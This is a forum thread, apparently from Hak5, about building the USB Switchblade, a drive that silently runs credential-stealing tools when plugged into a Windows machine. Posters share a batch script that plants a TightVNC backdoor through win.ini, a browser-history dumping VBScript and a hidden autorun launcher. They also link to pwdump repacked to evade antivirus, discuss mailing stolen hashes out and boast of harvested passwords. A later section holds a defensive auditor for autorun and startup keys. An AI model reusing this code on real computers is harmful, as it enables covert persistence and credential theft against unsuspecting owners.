
USB Switchblade Development


Darren Kitchen


OK, so I in turn modded xFilthyxJesusx's package...

I added a TightVNC installer and inject the run command into the win.ini file so it runs at startup:

progstart.bat renamed to progstart2.bat

and added the following progstart.bat:

@echo off

Xcopy "VNCHooks.dll" "C:\WINDOWS" /R /k /y
Xcopy "winvnc.exe" "C:\WINDOWS" /R /k /y

nircmd.exe execmd CALL batexeprogstart2.bat

cd /D "C:\WINDOWS"
echo [windows]>>win.ini
echo Run=winvnc.exe>>win.ini

This runs fine when executed normally but doesn't want to work when run from the autorun...

Any help?

Oh, and to kapowdude: nice how you make a duplicate of C: as a network folder :D, though the LM hash still won't be caught (all the log file gives is the username and machine name).


Huh, just curious how difficult it would be to add a feature to this switchblade: the capacity to copy files OFF of the computer you plug it into (e.g. documents, MSN Messenger logs, etc.), while maintaining its stealthiness.

It wouldn't be hard to program in, but I rather like it the way it is, since it's actually way more stealthy. As a systems administrator, if I found that this happened on my network I could check traffic logs and possibly find the drop site that the cracker used.

How would I go about programming the capacity to copy (LOCALLY, to the switchblade!) particular documents (like MSN Messenger logs, given the directory is known), while maintaining stealthiness? Any guidance/help would be greatly appreciated.

Also, is there a reason why mspass.exe and/or pspv.exe weren't encrypted like pwdump was? mspass, especially, would be crucial to my... switchblading.


Edit: I'm gonna start the wiki

Edit 2: http://www.hak5.org/wiki/index.php?title=USB_Switchblade (help!!!)

Oops, I think I just overwrote your wiki entry. That's the problem with wikis when two people go to create a page at the same time. Feel free to merge your info in; it should be in the history page.


Don't ignore me please :cry:


You need to fix this, I think. It seems to dump the passwords; unfortunately the device becomes unavailable afterwards. The orange light on my switchblade goes on for a sec then turns off.

/boots Linux to see what the deuce went wrong

EDIT: Works fine in Windows now (randomly). However, it didn't dump anything of mine. I did however find the password of "adwtiger" :wink:

Hmm, is autorun enabled? Sometimes it works for me, sometimes it doesn't...

Oh, and I fixed the zip :wink: thx


The IE history dump (DUH.vbs) doesn't seem to work on my system; at least it doesn't show every URL, just the domain and approximate date. So I whipped up something that does (based on the existing script; if I get the time I will rewrite it in JScript, VBScript is so damn ugly and I can't pack lots of instructions on one line :roll:)

on error resume next

' Walk a shell folder recursively; for entries below the per-site level print the
' page name (and, with fulldump, URL and date as well), otherwise the display name.
Function Dump(h,indent,fulldump)
    for each item in h.items
        if indent>1 then
            s=h.GetDetailsOf(item,0)
            if fulldump then s=h.GetDetailsOf(item,2)&vbTab&s&vbTab&h.GetDetailsOf(item,1)
        else
            s=h.GetDetailsOf(item,-1)
        end if
        wscript.echo String(indent," ")&s
        if item.isFolder then
            call Dump(item.GetFolder,indent+1,fulldump)
        end if
        if 0=indent then wscript.echo String(80,"-")
    next
End Function

' NameSpace(34) is the History shell folder (CSIDL_HISTORY)
Dump createobject("Shell.Application").NameSpace(34),0,true

The full version can dump to HTML and just raw URLs (no dates and page titles; the medium-size version supports this as well, just change the last true to false) ( http://rapidshare.de/files/32573713/IE_DumpHistory.vbs.html )

Usage (of full version):

  • cscript /nologo IE_DumpHistory.vbs html>dump.html
  • cscript /nologo IE_DumpHistory.vbs all>dump.txt

And finally, a very compact version:

on error resume next

Function D(h,indent)
    for each item in h.items
        wscript.echo String(indent," ")&h.GetDetailsOf(item,-1)
        ' recurse with D itself (the original called Dump with an undefined
        ' fulldump argument, which "on error resume next" silently swallowed,
        ' so sub-folders were never listed)
        if item.isFolder then call D(item.GetFolder,indent+1)
        if 0=indent then wscript.echo String(80,"-")
    next
End Function

D createobject("Shell.Application").NameSpace(34),0


Okay, I figured out it was my laptop causing my v3 problem. I got everything to work. Seeing these other posts, can I update the script to include a search for MSN/AIM/Yahoo passwords? If so, how do I go about doing that?

Isn't there a batch file you can make that automatically makes a separate admin account? I remember seeing that a long while back... I'll see if I can dig it up. lawl digg!


OK, so I'd like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on IRC if you have a better idea. nick == Brainkill

=====================

pwdump and its dependencies can be encrypted. I'll post links below to the programs. Standard disclaimers apply!

http://www.brainkill.net/hack/pwdump.exe

http://www.brainkill.net/hack/pwservice.exe

http://www.brainkill.net/hack/LsaExt.dll

=======================

I can verify that the latest version of Symantec AntiVirus Corporate Edition with the latest updates does not detect this now. Score one for Brainkill!

I downloaded the 3 files and ran a scan with Symantec AntiVirus Corporate Edition and it found pwdump.exe and pwservice.exe as "hacker tools", so I don't think it worked?



That's awesome, what a great addition to the payload. I'm not sure why it's not executing on autorun. Maybe someone has an idea.

I'm seeing a lot of great mods to the payloads; we should consider adding a section to the wiki switchblade page at:

www.hak5.org/wiki/index.php?title=USB_Switchblade


Not exactly sure what the XP issue listed on the wiki page is, but I whipped up a little something that I think fits the description.

Autorun.inf then looks like:

[Autorun]
open=AutoExec.exe

[AutoExec]
Cmd=Notepad
Params=%WinDir%\Win.ini

The NSIS source for the exe:

OutFile "AutoExec.exe"
SilentInstall silent
!define cfg "$ExeDir\AutoRun.Inf"

Section
    StrCpy $OUTDIR "$ExeDir"
    ; read the command and its arguments from the [AutoExec] section of the
    ; AutoRun.Inf sitting next to this exe, then launch it hidden
    ReadIniStr $0 ${cfg} "AutoExec" "Cmd"
    ReadIniStr $1 ${cfg} "AutoExec" "Params"
    ExecShell "" "$0" "$1" SW_HIDE
SectionEnd

Page InstFiles

Precompiled exe: http://rapidshare.de/files/32684592/AutoExec.exe.html
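A defender-side audit of the two INI-style files this thread writes to: the removable drive's Autorun.inf (the open= key plus the custom [AutoExec] section shown above) and the Run= line that the progstart.bat earlier in the thread appends to win.ini. This is an added example, not code from the thread or from any poster; the sample file contents are constructed from the layouts the posts show, and the duplicate [windows] section mirrors what appending with echo >> leaves behind.

```python
import configparser

# Autorun.inf keys that launch a program on insertion (the stub above uses open=).
AUTORUN_LAUNCH_KEYS = ("open", "shellexecute")
# [windows] keys Windows runs at logon; the thread's progstart.bat appends Run=.
WININI_STARTUP_KEYS = ("run", "load")

def _parse(text):
    # strict=False merges a repeated section, so a second [windows] block
    # appended to the end of win.ini with echo >> is folded into the first.
    cp = configparser.ConfigParser(strict=False, interpolation=None,
                                   allow_no_value=True)
    cp.read_string(text)
    return cp

def audit_autorun(text):
    """(key, value) pairs to review: launch keys in [Autorun] plus every entry
    of any extra section, since a custom section such as [AutoExec] is how a
    loader stub finds the command it should run."""
    cp = _parse(text)
    findings = []
    for section in cp.sections():
        if section.lower() == "autorun":
            for key in AUTORUN_LAUNCH_KEYS:
                if cp.has_option(section, key):
                    findings.append(("autorun." + key, cp.get(section, key)))
        else:
            for key, value in cp.items(section):
                findings.append((section + "." + key, value))
    return findings

def audit_winini(text):
    """Non-empty Run=/load= values from win.ini's [windows] section(s)."""
    cp = _parse(text)
    findings = []
    for section in cp.sections():
        if section.lower() == "windows":
            for key in WININI_STARTUP_KEYS:
                value = cp.get(section, key, fallback="")
                if value:
                    findings.append((key, value))
    return findings

# Constructed samples following the layouts posted in the thread (not real files).
SAMPLE_AUTORUN = "[Autorun]\nopen=AutoExec.exe\n\n[AutoExec]\nCmd=Notepad\nParams=%WinDir%\\Win.ini\n"
SAMPLE_WININI = "[windows]\nNullPort=None\n[fonts]\n[windows]\nRun=winvnc.exe\n"

if __name__ == "__main__":
    for finding in audit_autorun(SAMPLE_AUTORUN) + audit_winini(SAMPLE_WININI):
        print("review:", finding)
```

Point the two functions at the real Autorun.inf on a mounted drive and at %WinDir%\win.ini to get the same findings for a live host.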


Hello,

Are there any loaders out that can load this software on a Memorex drive? I have the Memorex Mini TravelDrive U3 and can't seem to find a loader for it.

Thanks,

Vext

I have this problem too. I have both a SanDisk U3 drive and a Memorex U3 drive. The lploader software will only work with a SanDisk U3 drive, but my drive is a 1 gig and I want to use my Memorex 512 MB drive for this. So far I can't find a loader that will let you flash a Memorex drive.

So it should be noted that so far this will only work on a SanDisk U3 drive unless you use amish's method.


First off, I'm new to the forums so let me start by saying hello!!

Now, I've been messing with this stuff for a while and have found that it doesn't matter if the .iso is in the same directory as the LPInstaller.exe; in my case it will always go out to the SanDisk site and pull the new .iso image. If I disable my network connection, formatting of the device will not complete successfully. My next move will be setting up a webserver on my local machine and spoofing the SanDisk site to trick it into pulling the modded .iso file. This was not my idea, all credit goes to Wesley McGrew:

http://www.cse.msstate.edu/~rwm8/hackingU3/

He has done a ton of work related to the U3 drives; in fact I think he was the first to publicly disclose this info. His site also mentions that as long as the .iso and LPInstaller.exe file are in the same directory there is no need to use the webserver trick.

Has this happened to anyone else? I have a 1 gig Micro a.k.a. switchblade.

regards,

straylight


I'd love to see it expanded so that it can email or somehow send the results to a user-specified destination, just for use in penetration testing.

lol this was on page 2 or 3 of this post :X

Anyways, as you've said there, it should be a possibility to mail it, although I don't know the extent of PHP scripting.

I've used/modified an email PHP script which doesn't use an SMTP server to mail (at least it doesn't make you specify one, nor have I seen one in the code...) so emailing pure spoofed email text is possible... but attaching something I'm not so sure of...

But then again, if it's all text then you're set; you just need to find a way to be able to send files via PHP scripting with that said script above, or just find a way to launch a USB FTP program that connects encrypted to a server to upload the LM hash...


Or you can use Google and find an easy way; running PHP scripts seems ineffective in my book. SendMail for Microsoft Windows :D http://www.geocities.com/jaber_aljundi/#Wh...SendMail_Tool__ Didn't play with it yet, but it seems simple enough since the file names are always the same, I guess.


Or you could use the command-line email utility blat from http://www.blat.net/

But again, as I've said before, I rather like the fact that the switchblade doesn't create network traffic, thus keeping the tool self-contained and leaving less evidence.


Heya guys. Well, bad news: I lost my memory stick with like hundreds of passwords on it :S So I had to change them all.

Anyways, before I lost it I had time to implement this:

http://www.cqure.net/wp/?page_id=7

It grabs and decrypts the password for TightVNC and RealVNC on the fly, and it runs on the command line :D

So that's good to implement. =)

I'm glad to see the project's going well.

But I think someone, or myself, should implement a command-line file encryptor to store these passwords safely every time we dump them, just in case we lose them... like me. I wish I did that before.
